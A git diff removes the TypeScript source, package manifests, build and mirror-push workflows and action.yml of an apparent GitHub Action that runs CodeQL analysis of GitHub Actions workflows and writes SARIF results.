"sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==", - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/node-fetch": { - "version": "2.7.0", - "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", - "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", - "dependencies": { - "whatwg-url": "^5.0.0" - }, - "engines": { - "node": "4.x || >=6.0.0" - }, - "peerDependencies": { - "encoding": "^0.1.0" - }, - "peerDependenciesMeta": { - "encoding": { - "optional": true - } - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/prettier": { - "version": "3.2.5", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.2.5.tgz", - "integrity": "sha512-3/GWa9aOC0YeD7LUfvOG2NiDyhOWRvt1k+rcKhOuYnMY24iiCphgneUfJDyFXd6rZCAnuLBv6UeAULtrhT/F4A==", - "dev": true, - "bin": { - "prettier": "bin/prettier.cjs" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/prettier/prettier?sponsor=1" - } - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/tr46": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", - "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" - }, - "node_modules/tunnel": { - "version": "0.0.6", - "resolved": "https://registry.npmjs.org/tunnel/-/tunnel-0.0.6.tgz", - "integrity": "sha512-1h/Lnq9yajKY2PEbBadPXj3VxsDDu844OnaAo52UVmIzIvwwtBPIuNvkjuzBlTWpfJyUbG3ez0KSBibQkj4ojg==", - "engines": { - "node": ">=0.6.11 <=0.7.0 || >=0.7.3" - } - }, - "node_modules/typescript": { - "version": "5.3.3", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.3.3.tgz", - "integrity": "sha512-pXWcraxM0uxAS+tN0AG/BF2TyqmHO014Z070UsJ+pFvYuRSq8KH8DmWpnbXe0pEPDHXZV3FcAbJkijJ5oNEnWw==", - "dev": true, - "bin": { - "tsc": "bin/tsc", - "tsserver": "bin/tsserver" - }, - "engines": { - "node": ">=14.17" - } - }, - "node_modules/undici": { - "version": "5.28.3", - "resolved": "https://registry.npmjs.org/undici/-/undici-5.28.3.tgz", - "integrity": "sha512-3ItfzbrhDlINjaP0duwnNsKpDQk3acHI3gVJ1z4fmwMK31k5G9OVIAMLSIaP6w4FaGkaAkN6zaQO9LUvZ1t7VA==", - "dependencies": { - "@fastify/busboy": "^2.0.0" - }, - "engines": { - "node": ">=14.0" - } - }, - "node_modules/undici-types": { - "version": "5.26.5", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", - "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==", - "dev": true - }, - "node_modules/universal-user-agent": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/universal-user-agent/-/universal-user-agent-6.0.1.tgz", - "integrity": "sha512-yCzhz6FN2wU1NiiQRogkTQszlQSlpWaw8SvVegAc+bDxbzHgh1vX8uIe8OYyMH6DwH+sdTJsgMl36+mSMdRJIQ==" - }, - "node_modules/uuid": { - "version": "8.3.2", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", - "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", - "bin": { - "uuid": "dist/bin/uuid" - } - }, - "node_modules/webidl-conversions": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", - "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" - }, - "node_modules/whatwg-url": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", - "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", - "dependencies": { - "tr46": "~0.0.3", - "webidl-conversions": "^3.0.0" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" - } - }, - "dependencies": { - "@actions/core": { - "version": "1.10.1", - "resolved": "https://registry.npmjs.org/@actions/core/-/core-1.10.1.tgz", - "integrity": "sha512-3lBR9EDAY+iYIpTnTIXmWcNbX3T2kCkAEQGIQx4NVQ0575nk2k3GRZDTPQG+vVtS2izSLmINlxXf0uLtnrTP+g==", - "requires": { - "@actions/http-client": "^2.0.1", - "uuid": "^8.3.2" - } - }, - "@actions/exec": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/@actions/exec/-/exec-1.1.1.tgz", - "integrity": "sha512-+sCcHHbVdk93a0XT19ECtO/gIXoxvdsgQLzb2fE2/5sIZmWQuluYyjPQtrtTHdU1YzTZ7bAPN4sITq2xi1679w==", - "requires": { - "@actions/io": "^1.0.1" - } - }, - "@actions/github": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/@actions/github/-/github-5.1.1.tgz", - "integrity": "sha512-Nk59rMDoJaV+mHCOJPXuvB1zIbomlKS0dmSIqPGxd0enAXBnOfn4VWF+CGtRCwXZG9Epa54tZA7VIRlJDS8A6g==", - "requires": { - "@actions/http-client": "^2.0.1", - "@octokit/core": "^3.6.0", - "@octokit/plugin-paginate-rest": "^2.17.0", - "@octokit/plugin-rest-endpoint-methods": "^5.13.0" - } - }, - "@actions/http-client": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/@actions/http-client/-/http-client-2.2.0.tgz", - "integrity": "sha512-q+epW0trjVUUHboliPb4UF9g2msf+w61b32tAkFEwL/IwP0DQWgbCMM0Hbe3e3WXSKz5VcUXbzJQgy8Hkra/Lg==", - "requires": { - "tunnel": "^0.0.6", - "undici": "^5.25.4" - } - }, - "@actions/io": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/@actions/io/-/io-1.1.3.tgz", - "integrity": "sha512-wi9JjgKLYS7U/z8PPbco+PvTb/nRWjeoFlJ1Qer83k/3C5PHQi28hiVdeE2kHXmIL99mQFawx8qt/JPjZilJ8Q==" - }, - "@actions/tool-cache": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@actions/tool-cache/-/tool-cache-2.0.1.tgz", - "integrity": "sha512-iPU+mNwrbA8jodY8eyo/0S/QqCKDajiR8OxWTnSk/SnYg0sj8Hp4QcUEVC1YFpHWXtrfbQrE13Jz4k4HXJQKcA==", - "requires": { - "@actions/core": "^1.2.6", - "@actions/exec": "^1.0.0", - "@actions/http-client": "^2.0.1", - "@actions/io": "^1.1.1", - "semver": "^6.1.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" - } - } - }, - "@fastify/busboy": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-2.1.0.tgz", - "integrity": "sha512-+KpH+QxZU7O4675t3mnkQKcZZg56u+K/Ct2K+N2AZYNVK8kyeo/bI18tI8aPm3tvNNRyTWfj6s5tnGNlcbQRsA==" - }, - "@octokit/auth-token": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/@octokit/auth-token/-/auth-token-2.5.0.tgz", - "integrity": "sha512-r5FVUJCOLl19AxiuZD2VRZ/ORjp/4IN98Of6YJoJOkY75CIBuYfmiNHGrDwXr+aLGG55igl9QrxX3hbiXlLb+g==", - "requires": { - "@octokit/types": "^6.0.3" - } - }, - "@octokit/core": { - "version": "3.6.0", - "resolved": "https://registry.npmjs.org/@octokit/core/-/core-3.6.0.tgz", - "integrity": "sha512-7RKRKuA4xTjMhY+eG3jthb3hlZCsOwg3rztWh75Xc+ShDWOfDDATWbeZpAHBNRpm4Tv9WgBMOy1zEJYXG6NJ7Q==", - "requires": { - "@octokit/auth-token": "^2.4.4", - "@octokit/graphql": "^4.5.8", - "@octokit/request": "^5.6.3", - "@octokit/request-error": "^2.0.5", - "@octokit/types": "^6.0.3", - "before-after-hook": "^2.2.0", - "universal-user-agent": "^6.0.0" - } - }, - "@octokit/endpoint": { - "version": "6.0.12", - "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-6.0.12.tgz", - "integrity": "sha512-lF3puPwkQWGfkMClXb4k/eUT/nZKQfxinRWJrdZaJO85Dqwo/G0yOC434Jr2ojwafWJMYqFGFa5ms4jJUgujdA==", - "requires": { - "@octokit/types": "^6.0.3", - "is-plain-object": "^5.0.0", - "universal-user-agent": "^6.0.0" - } - }, - "@octokit/graphql": { - "version": "4.8.0", - "resolved": "https://registry.npmjs.org/@octokit/graphql/-/graphql-4.8.0.tgz", - "integrity": "sha512-0gv+qLSBLKF0z8TKaSKTsS39scVKF9dbMxJpj3U0vC7wjNWFuIpL/z76Qe2fiuCbDRcJSavkXsVtMS6/dtQQsg==", - "requires": { - "@octokit/request": "^5.6.0", - "@octokit/types": "^6.0.3", - "universal-user-agent": "^6.0.0" - } - }, - "@octokit/openapi-types": { - "version": "12.11.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-12.11.0.tgz", - "integrity": "sha512-VsXyi8peyRq9PqIz/tpqiL2w3w80OgVMwBHltTml3LmVvXiphgeqmY9mvBw9Wu7e0QWk/fqD37ux8yP5uVekyQ==" - }, - "@octokit/plugin-paginate-rest": { - "version": "2.21.3", - "resolved": "https://registry.npmjs.org/@octokit/plugin-paginate-rest/-/plugin-paginate-rest-2.21.3.tgz", - "integrity": "sha512-aCZTEf0y2h3OLbrgKkrfFdjRL6eSOo8komneVQJnYecAxIej7Bafor2xhuDJOIFau4pk0i/P28/XgtbyPF0ZHw==", - "requires": { - "@octokit/types": "^6.40.0" - } - }, - "@octokit/plugin-rest-endpoint-methods": { - "version": "5.16.2", - "resolved": "https://registry.npmjs.org/@octokit/plugin-rest-endpoint-methods/-/plugin-rest-endpoint-methods-5.16.2.tgz", - "integrity": "sha512-8QFz29Fg5jDuTPXVtey05BLm7OB+M8fnvE64RNegzX7U+5NUXcOcnpTIK0YfSHBg8gYd0oxIq3IZTe9SfPZiRw==", - "requires": { - "@octokit/types": "^6.39.0", - "deprecation": "^2.3.1" - } - }, - "@octokit/request": { - "version": "5.6.3", - "resolved": "https://registry.npmjs.org/@octokit/request/-/request-5.6.3.tgz", - "integrity": "sha512-bFJl0I1KVc9jYTe9tdGGpAMPy32dLBXXo1dS/YwSCTL/2nd9XeHsY616RE3HPXDVk+a+dBuzyz5YdlXwcDTr2A==", - "requires": { - "@octokit/endpoint": "^6.0.1", - "@octokit/request-error": "^2.1.0", - "@octokit/types": "^6.16.1", - "is-plain-object": "^5.0.0", - "node-fetch": "^2.6.7", - "universal-user-agent": "^6.0.0" - } - }, - "@octokit/request-error": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-2.1.0.tgz", - "integrity": "sha512-1VIvgXxs9WHSjicsRwq8PlR2LR2x6DwsJAaFgzdi0JfJoGSO8mYI/cHJQ+9FbN21aa+DrgNLnwObmyeSC8Rmpg==", - "requires": { - "@octokit/types": "^6.0.3", - "deprecation": "^2.0.0", - "once": "^1.4.0" - } - }, - "@octokit/types": { - "version": "6.41.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-6.41.0.tgz", - "integrity": "sha512-eJ2jbzjdijiL3B4PrSQaSjuF2sPEQPVCPzBvTHJD9Nz+9dw2SGH4K4xeQJ77YfTq5bRQ+bD8wT11JbeDPmxmGg==", - "requires": { - "@octokit/openapi-types": "^12.11.0" - } - }, - "@types/node": { - "version": "20.12.7", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.12.7.tgz", - "integrity": "sha512-wq0cICSkRLVaf3UGLMGItu/PtdY7oaXaI/RVU+xliKVOtRna3PRY57ZDfztpDL0n11vfymMUnXv8QwYCO7L1wg==", - "dev": true, - "requires": { - "undici-types": "~5.26.4" - } - }, - "@vercel/ncc": { - "version": "0.38.1", - "resolved": "https://registry.npmjs.org/@vercel/ncc/-/ncc-0.38.1.tgz", - "integrity": "sha512-IBBb+iI2NLu4VQn3Vwldyi2QwaXt5+hTyh58ggAMoCGE6DJmPvwL3KPBWcJl1m9LYPChBLE980Jw+CS4Wokqxw==", - "dev": true - }, - "before-after-hook": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/before-after-hook/-/before-after-hook-2.2.3.tgz", - "integrity": "sha512-NzUnlZexiaH/46WDhANlyR2bXRopNg4F/zuSA3OpZnllCUgRaOF2znDioDWrmbNVsuZk6l9pMquQB38cfBZwkQ==" - }, - "deprecation": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/deprecation/-/deprecation-2.3.1.tgz", - "integrity": "sha512-xmHIy4F3scKVwMsQ4WnVaS8bHOx0DmVwRywosKhaILI0ywMDWPtBSku2HNxRvF7jtwDRsoEwYQSfbxj8b7RlJQ==" - }, - "is-plain-object": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", - "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==" - }, - "node-fetch": { - "version": "2.7.0", - "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", - "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", - "requires": { - "whatwg-url": "^5.0.0" - } - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "requires": { - "wrappy": "1" - } - }, - "prettier": { - "version": "3.2.5", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.2.5.tgz", - "integrity": "sha512-3/GWa9aOC0YeD7LUfvOG2NiDyhOWRvt1k+rcKhOuYnMY24iiCphgneUfJDyFXd6rZCAnuLBv6UeAULtrhT/F4A==", - "dev": true - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==" - }, - "tr46": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", - "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" - }, - "tunnel": { - "version": "0.0.6", - "resolved": "https://registry.npmjs.org/tunnel/-/tunnel-0.0.6.tgz", - "integrity": "sha512-1h/Lnq9yajKY2PEbBadPXj3VxsDDu844OnaAo52UVmIzIvwwtBPIuNvkjuzBlTWpfJyUbG3ez0KSBibQkj4ojg==" - }, - "typescript": { - "version": "5.3.3", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.3.3.tgz", - "integrity": "sha512-pXWcraxM0uxAS+tN0AG/BF2TyqmHO014Z070UsJ+pFvYuRSq8KH8DmWpnbXe0pEPDHXZV3FcAbJkijJ5oNEnWw==", - "dev": true - }, - "undici": { - "version": "5.28.3", - "resolved": "https://registry.npmjs.org/undici/-/undici-5.28.3.tgz", - "integrity": "sha512-3ItfzbrhDlINjaP0duwnNsKpDQk3acHI3gVJ1z4fmwMK31k5G9OVIAMLSIaP6w4FaGkaAkN6zaQO9LUvZ1t7VA==", - "requires": { - "@fastify/busboy": "^2.0.0" - } - }, - "undici-types": { - "version": "5.26.5", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", - "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==", - "dev": true - }, - "universal-user-agent": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/universal-user-agent/-/universal-user-agent-6.0.1.tgz", - "integrity": "sha512-yCzhz6FN2wU1NiiQRogkTQszlQSlpWaw8SvVegAc+bDxbzHgh1vX8uIe8OYyMH6DwH+sdTJsgMl36+mSMdRJIQ==" - }, - "uuid": { - "version": "8.3.2", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", - "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==" - }, - "webidl-conversions": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", - "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" - }, - "whatwg-url": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", - "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", - "requires": { - "tr46": "~0.0.3", - "webidl-conversions": "^3.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" - } - } -} diff --git a/.github/action/package.json b/.github/action/package.json deleted file mode 100644 index cd9021d20c5..00000000000 --- a/.github/action/package.json +++ /dev/null @@ -1,48 +0,0 @@ -{ - "name": "codeql-actions-action", - "version": "0.1.0", - "description": "CodeQL Pack to analyze GitHub Actions and Workflows", - "main": "dist/index.js", - "scripts": { - "bundle": "npm run format:write && npm run package", - "cli": "ts-node src/index.ts", - "ci-test": "jest", - "format:write": "prettier --write **/*.ts", - "format:check": "prettier --check **/*.ts", - "lint": "npx eslint . -c ./.github/linters/.eslintrc.yml", - "package": "ncc build src/index.ts --license licenses.txt", - "package:watch": "npm run package -- --watch", - "test": "(jest && make-coverage-badge --output-path ./badges/coverage.svg) || make-coverage-badge --output-path ./badges/coverage.svg", - "all": "npm run format:write && npm run lint && npm run test && npm run package" - }, - "repository": { - "type": "git", - "url": "git+https://github.com/GitHubSecurityLab/codeql-actions.git" - }, - "exports": { - ".": "./dist/index.js" - }, - "keywords": [ - "codeql", - "security", - "actions" - ], - "author": "Pwntester", - "license": "MIT", - "bugs": { - "url": "https://github.com/GitHubSecurityLab/codeql-actions/issues" - }, - "homepage": "https://github.com/GitHubSecurityLab/codeql-actions#readme", - "dependencies": { - "@actions/core": "^1.10.1", - "@actions/exec": "^1.1.1", - "@actions/github": "^5.1.1", - "@actions/tool-cache": "^2.0.1" - }, - "devDependencies": { - "@types/node": "^20.12.7", - "@vercel/ncc": "^0.38.0", - "prettier": "^3.0.3", - "typescript": "^5.2.2" - } -} diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts deleted file mode 100644 index 5b06b007d8a..00000000000 --- a/.github/action/src/codeql.ts +++ /dev/null @@ -1,172 +0,0 @@ -import * as fs from "fs"; -import * as path from "path"; - -import * as core from "@actions/core"; -import * as toolcache from "@actions/tool-cache"; -import * as toolrunner from "@actions/exec/lib/toolrunner"; - -export interface CodeQLConfig { - // The path to the codeql bundle. - path: string; - // The language to use for analysis. - language: string; - // CodeQL pack to use for analysis. - pack: string; - // The codeql suite to use for analysis. - suite: string; - // The source root to use for analysis. - source_root?: string; - // The output file for the SARIF file. - output?: string; - // Extension CodeQL packs to use for analysis. - packs: string | undefined; -} - -export async function newCodeQL(): Promise { - return { - language: "javascript", - path: await findCodeQL(), - pack: "github/actions-queries", - suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, - source_root: core.getInput("source-root"), - output: core.getInput("sarif"), - packs: - core.getInput("packs").length > 0 ? core.getInput("packs") : undefined, - }; -} - -export async function runCommand( - config: CodeQLConfig, - args: string[], - cwd_arg?: string, -): Promise { - var bin = path.join(config.path, "codeql"); - let output = ""; - var cwd: string = process.cwd(); - if (cwd_arg) { - cwd = cwd_arg; - } - core.info("Current working directory: " + cwd); - var options = { - cwd: cwd, - listeners: { - stdout: (data: Buffer) => { - output += data.toString(); - }, - }, - }; - - await new toolrunner.ToolRunner(bin, args, options).exec(); - core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); - - return output.trim(); -} - -export async function runCommandJson( - config: CodeQLConfig, - args: string[], -): Promise { - return JSON.parse(await runCommand(config, args)); -} -async function findCodeQL(): Promise { - // check if codeql is in the toolcache - var codeqlPath = await findCodeQlInToolcache(); - if (codeqlPath !== undefined) { - return codeqlPath; - } - // default to the codeql in the path - return "codeql"; -} - -async function findCodeQlInToolcache(): Promise { - const candidates = toolcache - .findAllVersions("CodeQL") - .map((version) => ({ - folder: toolcache.find("CodeQL", version), - version, - })) - .filter(({ folder }) => fs.existsSync(path.join(folder, "pinned-version"))); - - if (candidates.length === 1) { - const candidate = candidates[0]; - core.info(`CodeQL tools found in toolcache: '${candidate.folder}'.`); - core.debug(`CodeQL toolcache version: '${candidate.version}'.`); - - return path.join(candidate.folder, "codeql"); - } - - core.warning(`No CodeQL tools found in toolcache.`); - - return undefined; -} - -export async function downloadPack(codeql: CodeQLConfig): Promise { - try { - await runCommand(codeql, ["pack", "download", codeql.pack]); - return true; - } catch (error) { - core.warning("Failed to download pack from GitHub..."); - } - return false; -} - -export async function codeqlDatabaseCreate( - codeql: CodeQLConfig, -): Promise { - // get runner temp directory for database - var temp = process.env["RUNNER_TEMP"]; - if (temp === undefined) { - temp = "/tmp"; - } - var database_path = path.join(temp, "codeql-actions-db"); - var source_root = - codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; - - await runCommand(codeql, [ - "database", - "create", - "--language", - codeql.language, - "--source-root", - source_root, - database_path, - ]); - - return database_path; -} - -export async function codeqlDatabaseAnalyze( - codeql: CodeQLConfig, - database_path: string, -): Promise { - var codeql_output = codeql.output || "codeql-actions.sarif"; - - var cmd = [ - "database", - "analyze", - "--format", - "sarif-latest", - "--sarif-add-query-help", - "--output", - codeql_output, - ]; - - if (codeql.packs !== undefined) { - cmd.push("--extension-packs", codeql.packs); - } - - // remote pack or local pack - if (codeql.pack.startsWith("githubsecuritylab/")) { - var suite = codeql.pack + ":" + codeql.suite; - } else { - // assume path - var suite = path.join(codeql.pack, codeql.suite); - cmd.push("--search-path", codeql.pack); - } - - cmd.push(database_path, suite); - - await runCommand(codeql, cmd); - - return codeql_output; -} diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts deleted file mode 100644 index 53a484ae6c1..00000000000 --- a/.github/action/src/index.ts +++ /dev/null @@ -1,61 +0,0 @@ -import * as path from "path"; -import * as core from "@actions/core"; -import * as cql from "./codeql"; - -/** - * The main function for the action. - * @returns {Promise} Resolves when the action is complete. - */ -export async function run(): Promise { - try { - // set up codeql - var codeql = await cql.newCodeQL(); - - core.debug(`CodeQL CLI found at '${codeql.path}'`); - - await cql.runCommand(codeql, ["version", "--format", "terse"]); - - // check javascript support - var languages = await cql.runCommandJson(codeql, [ - "resolve", - "languages", - "--format", - "json", - ]); - - if (!languages.hasOwnProperty("javascript")) { - core.setFailed("CodeQL javascript extractor not installed"); - throw new Error("CodeQL javascript extractor not installed"); - } - - // download pack - core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - var pack_downloaded = await cql.downloadPack(codeql); - - if (pack_downloaded === false) { - var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); - codeql.pack = path.join(action_path, "ql", "src"); - - core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); - } else { - core.info(`Pack downloaded '${codeql.pack}'`); - } - - core.info("Creating CodeQL database..."); - var database_path = await cql.codeqlDatabaseCreate(codeql); - - core.info("Running CodeQL analysis..."); - var sarif = await cql.codeqlDatabaseAnalyze(codeql, database_path); - - core.info(`SARIF results: '${sarif}'`); - core.setOutput("sarif", sarif); - - core.info("Finished CodeQL analysis"); - } catch (error) { - // Fail the workflow run if an error occurs - if (error instanceof Error) core.setFailed(error.message); - } -} - -// eslint-disable-next-line @typescript-eslint/no-floating-promises -run(); diff --git a/.github/action/tsconfig.json b/.github/action/tsconfig.json deleted file mode 100644 index c4b7762f9cd..00000000000 --- a/.github/action/tsconfig.json +++ /dev/null @@ -1,24 +0,0 @@ -{ - "$schema": "https://json.schemastore.org/tsconfig", - "compilerOptions": { - "target": "ES2022", - "module": "NodeNext", - "rootDir": "./src", - "moduleResolution": "NodeNext", - "baseUrl": "./", - "sourceMap": true, - "outDir": "./dist", - "noImplicitAny": true, - "esModuleInterop": true, - "forceConsistentCasingInFileNames": true, - "strict": true, - "skipLibCheck": true, - "newLine": "lf" - }, - "exclude": [ - "./dist", - "./node_modules", - "./__tests__", - "./coverage" - ] -} diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml deleted file mode 100644 index 9bc5b787fea..00000000000 --- a/.github/workflows/build.yml +++ /dev/null @@ -1,30 +0,0 @@ -name: Build and Compile Action - -on: - pull_request: - branches: ["master", "develop"] - workflow_dispatch: - -permissions: - contents: read - packages: read - pull-requests: read - -jobs: - action: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v4 - - uses: dorny/paths-filter@v3 - id: changes - with: - filters: | - src: - - '.github/action/**' - - 'action.yml' - - - name: Run action - if: steps.changes.outputs.src == 'true' - uses: ./ - with: - token: ${{ secrets.GHCR_TOKEN }} diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml deleted file mode 100644 index a6b568f2bfb..00000000000 --- a/.github/workflows/copy-to-bughalla.yml +++ /dev/null @@ -1,34 +0,0 @@ -name: Copy to Bughalla - -on: - push: - branches: - - 'master' - -permissions: - contents: read - -jobs: - copy: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v4 - with: - token: ${{ secrets.BUGHALLA_TOKEN }} - fetch-depth: 0 - - - run: | - rm -rf .github/workflows/copy-to-bughalla.yml - git remote set-url --push origin git@github.com:bughalla/codeql-actions - git config user.name 'github-actions[bot]' - git config user.email 'github-actions[bot]@users.noreply.github.com' - git add -v . - git commit -m 'Actions: Add patch' - - - name: Push changes - uses: ad-m/github-push-action@35284cf030a5836cb567a7bf1b39ebafbfae5f4a - with: - repository: bughalla/codeql-actions - github_token: ${{ secrets.BUGHALLA_TOKEN }} - branch: ${{ github.ref }} - force: true diff --git a/action.yml b/action.yml deleted file mode 100644 index 151c909fb8b..00000000000 --- a/action.yml +++ /dev/null @@ -1,51 +0,0 @@ -name: "codeql-actions" -description: "CodeQL Pack for GitHub Actions and Workflows" - -inputs: - token: - description: GitHub Token - default: ${{ github.token }} - source-root: - description: "Path of the root source code directory, relative to $GITHUB_WORKSPACE." - default: ${{ github.workspace }} - sarif-output: - description: "SARIF File Output" - default: "codeql-actions.sarif" - suite: - description: "CodeQL Suite to run" - default: "actions-code-scanning" - packs: - description: >- - Comma-separated list of packs to run. Reference a pack in the format `scope/name[@version]`. If `version` is not - specified, then the latest version of the pack is used. By default, this overrides the same setting in a - configuration file; prefix with "+" to use both sets of packs. - required: false - -runs: - using: 'composite' - steps: - - name: extpack contents - shell: bash - if: inputs.packs - env: - EXTPACK_PATH: /home/runner/.codeql/packages/local/workflow-models/0.0.1 - EXTPACK_NAME: local/workflow-models - run: | - echo "##[group] Workflow Models" - if [ -f $EXTPACK_PATH/models.yml ]; then cat $EXTPACK_PATH/models.yml; fi - echo "##[endgroup]" - 